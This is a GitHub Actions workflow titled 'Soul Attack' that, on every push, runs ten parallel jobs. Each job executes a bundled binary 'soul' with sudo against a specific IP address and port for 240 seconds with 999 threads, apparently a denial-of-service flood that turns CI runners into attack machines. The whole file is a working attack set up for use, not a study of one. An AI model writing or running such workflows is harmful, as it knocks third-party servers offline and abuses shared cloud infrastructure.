name: Soul Attack
on: [push]

jobs:
  attack1:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5]
    steps:
    - uses: actions/checkout@v3
    - run: chmod +x soul
    - run: sudo ./soul 20.235.51.182 23973 240 999
  
  attack2:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5]
    steps:
    - uses: actions/checkout@v3
    - run: chmod +x soul
    - run: sudo ./soul 20.235.51.182 23973 240 999
